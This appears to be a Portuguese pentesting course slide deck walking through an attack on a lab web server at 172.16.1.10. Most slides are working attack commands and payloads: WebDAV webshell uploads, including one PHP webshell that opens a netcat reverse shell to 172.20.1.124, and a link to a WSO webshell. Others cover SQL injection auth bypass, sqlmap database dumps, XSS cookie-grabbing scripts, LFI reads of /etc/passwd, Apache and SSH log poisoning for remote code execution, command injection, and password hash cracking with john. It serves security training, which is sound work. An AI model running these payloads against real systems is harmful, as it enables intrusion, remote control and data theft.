PENTESTER WEB

BLACK BOX INTERNO

Escopo: 172.16.1.10
White Box – Sabe todas as informações.
Black Box – Nenhuma informação é passada.
Gray Box – É um mix, alguma informação passada.

25/05/2021 1 /42
 https://raw.githubusercontent.com/carlosalbertotuma/DCPT-Pentesting/main/Sw1tchbl4d3.sh

25/05/2021 2 /42
 Fases do Pentester

1 – Preparação: Decidir o escopo do teste da invasão. 172.16.1.10

2 – Coleta de Informações: OSINT (Open Source Intelligence).
3 – Mapeamento da Rede: Pesquisa Dns.
4 – Enumeração de Serviços: Portas abertas/serviços em execução.
5 – Análise de Vulnerabilidades: Detecção de vetores de ataque.
6 – Exploração de Falhas: Utilizando técnicas de ataque.
7 – Pós-Exploração: Reunir informações do sistema e arquivos, criar backdoor.

25/05/2021 3 /42
 Enumeração de Serviços

nmap -sS -sV 172.16.1.10

-sS - TCP SYN
-sV – Serviço e Versão

25/05/2021 4 /42
 Enumeração Arquivos/Pastas – Servidor Web

200 - OK
401 - Não autorizado

https://www.hostinger.com.br/tutoriais/o-que-e-http-error-e-principais-codigos-http

python3 dirsearch.py -f -e php -u 172.16.10 -w big.txt -x 403,500

gobuster dir -r -u 172.16.1.10 -w big.txt -e -t 100 -x php --no-error -b 403,404 -q

25/05/2021 5 /42
 Clonando Web Site

wget -m http://172.16.1.10/turismo/

25/05/2021 6 /42
 Análise de Vulnerabilidade – Método HTTP

curl -v -X OPTIONS http://172.16.10/webdav/

Protocolo WebDAV é um conjunto de extensões CVE-2017-12615 Apache Tomcat 7.0.0 a 7.0.79

para o protocolo HTTP que permite que usuários
gerenciem arquivos em servidores remotos. https://www.cvedetails.com/cve/CVE-2017-12615/

25/05/2021 7 /42
 Exploração de vulnerabilidade – WebDav - RCE

cadaver http://172.16.1.10/webdav/

davtest --url http://172.16.1.10/webdav/

25/05/2021 8 /42
 Exploração de vulnerabilidade – WebDav – RCE – Reverse Shell

curl -X PUT -d "<?php system('id');?>" 172.16.1.10/webdav/webshell.php

curl -s -X GET 172.16.1.10/webshell.php | egrep -v "<"

curl -X PUT -d "<?php system('nc -e /bin/sh 172.20.1.124 80');?>" 172.16.1.5/dav/webshell.php

curl -X GET 172.16.1.10/webshell.php

25/05/2021 9 /42
 Exploração de vulnerabilidade – WebDav – RCE – Reverse Shell

curl -X PUT http://$ip/ --upload-file webshell2.php

curl -X GET http://$ip/webshell2.php

25/05/2021 10 /42
 Exploração de vulnerabilidade – WebDav – upload de arquivos

25/05/2021 11 /42
 Exploração de vulnerabilidade – WebDav – WebShell Gráfica – Reverse Shell

ghost287

https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php

25/05/2021 12 /42
 Análise de Vulnerabilidades

Vetores de Ataque
Campos de Buscas
Campos de Login / Autenticação
Campos de Registro / Cadastro
Redirecionamentos
Parâmetros GET e POST
Download
Upload
Posts

25/05/2021 13 /42
 Análise de Vulnerabilidades / Exploração - Bypass Authentication: SQL Injection

https://github.com/v0re/dirb/tree/master/wordlists
rockyou.txt ‘ or 2=2#
https://github.com/1N3/IntruderPayloads
teste’ or id=1#

git clone https://github.com/danielmiessler/SecLists.git

25/05/2021 14 /42
 Análise de Vulnerabilidades / Exploração - Full Path Discovery - Paramentro

25/05/2021 15 /42
 Análise de Vulnerabilidades / Exploração - Path Traversal

25/05/2021 16 /42
 Brute Force Hash Linux

john hashlinux.txt--wordlist=rockyou.txt
john hashlinux.txt --show

25/05/2021 17 /42
 Análise de Vulnerabilidades / Exploração - Bypass Authentication: Metodo HTTP
administrador:michael

curl -X POST http://172.16.1.10/logs/

25/05/2021 18 /42
 HTML Injection – XSS Cross Site Scripting – Refletido - Self-XSS

<h1>teste</h1>

<form>LOGIN:<input type=”text”></form>

<a href=”http://clone/”><h1>50%Desconto</h1></a>

<script>alert(document.cookie)</script>

<script>document.location=”clone”</script>

http://172.16.1.10/turismo/procurar.php/”><scrip>alert(“teste”)</script>

25/05/2021 19 /42
 XSS Cross Site Scripting – XSSTRIKE

python3 xsstrike.py -u http://172.16.1.10/turismo/procurar.php/ --path

python3 xsstrike.py -u http://172.16.1.10/turismo/procurar.php --params

python3 xsstrike.py -u http://172.16.1.10/turismo/procurar.php?busca=aa

25/05/2021 20 /42
 Análise de Vulnerabilidade / Exploração – Full Path Discovery – Local File Inclusion

curl -s 172.16.1.10/turismo/info.php?p=../../../../../../../etc/passwd | grep -v "<"

25/05/2021 21 /42
 Infecção de log Apache – Local File Inclusion - Remote Code Execution

Infecção de log ocorre quando, conseguimos

acessar um arquivo de log, de um determinado
serviço, que estejam rodando no servidor, pode
ser email, ssh, apache, funciona explorando a
falha de LFI, o pentester faz uma requisição mal
intencionada ao serviço infectando o log, logo
após utiliza a falha e para executar códigos
remotos no servidor.

nc -v 172.16.1.10 80 -C <?php system($_GET['sw1tchbl4d3']); ?>

curl -s -X GET "$local2../../../../../../../var/log/apache2/access.log&sw1tchbl4d3=$comando" | egrep -v "172|<"

25/05/2021 22 /42
 Infecção de Log SSH – Local File Inclusion - Remote Code Execution

ssh '<?php system($_GET["sw1tchbl4d3"]); ?>'@172.16.1.177

25/05/2021 23 /42
 Infecção de log SSH – Local File Inclusion - Remote Code Execution

25/05/2021 24 /42
Open Redirect - Parâmetro Codificado– Remote File Inclusion - Remote Code Execution
http://172.16.1.10/turismo/pages.php?page=bG9naW4ucGhw
http://172.16.1.10/turismo/redir.php?url=http://facebook.com/mrturismo20

<?php system($_GET[‘sw1tchbl4d3’]); ?>

25/05/2021 25 /42
 Automatizando Testes SQLI – GET – POST - SQLMAP
sqlmap -u "http://172.16.1.10/turismo/agencias.php?loja=sp" --dbs

sqlmap -u "http://172.16.1.10/turismo/login.php" --data="login=a&senha=a" --dbs

25/05/2021 26 /42
 Automatizando Testes SQLI – GET - SQLMAP
c

25/05/2021 27 /42
 Automatizando Testes SQLI – GET - SQLMAP

sqlmap -u $url --risk=3 --level=5 --random-agent --dbs

sqlmap -u $url --risk=3 --level=5 --random-agent -D $database1 --tables
sqlmap -u $url --risk=3 --level=5 --random-agent -D $database1 -T $tabela --columns
sqlmap -u $url --risk=3 --level=5 --random-agent -D $database1 -T $tabela -C $coluna --dump

25/05/2021 28 /42
 Command Injection

25/05/2021 29 /42
 Command Injection

curl -s -X POST -d "site=;ls -lha; #" http://172.16.1.10/hosting/ | grep -v "<"

25/05/2021 30 /42
 Command Injection - Commix

25/05/2021 31 /42
 Command Injection – Automatizando com commix

python3 commix.py --url http://172.16.1.10/hosting/ --data="site=" security=low

25/05/2021 32 /42
 Blind SQLi – BURP SUITE

25/05/2021 33 /42
 Blind SQLi – BURP SUITE

25/05/2021 34 /42
 Blind SQLi – BURP SUITE

25/05/2021 35 /42
 Blind SQLi – BURP SUITE

25/05/2021 36 /42
 Blind SQLi Avançado – BURP SUITE

curl -s X POST -F "login=CarlosTuma' or database() = char(100,98,109,114,116,117,114) #" http://172.16.1.10/turismo/ativar-conta.php | egrep "h3"

Ascii / Decimal echo dbmrtur | perl -lne 'print join " ", map { ord $_ } split //' | awk '{print $1","$2","$3","$4","$5","$6","$7}'

25/05/2021 37 /42
 BURP SUITE – INTRUDER – LFI - PAYLOADS

25/05/2021 38 /42
 BURP SUITE – BRUTE FORCE - DECODER

25/05/2021 39 /42
 BURP SUITE – BRUTE FORCE - DECODER

25/05/2021 40 /42
 BURP SUITE – BRUTE FORCE - DECODER

25/05/2021 41 /42
 Script Analisando - BURP SUITE

25/05/2021 42 /42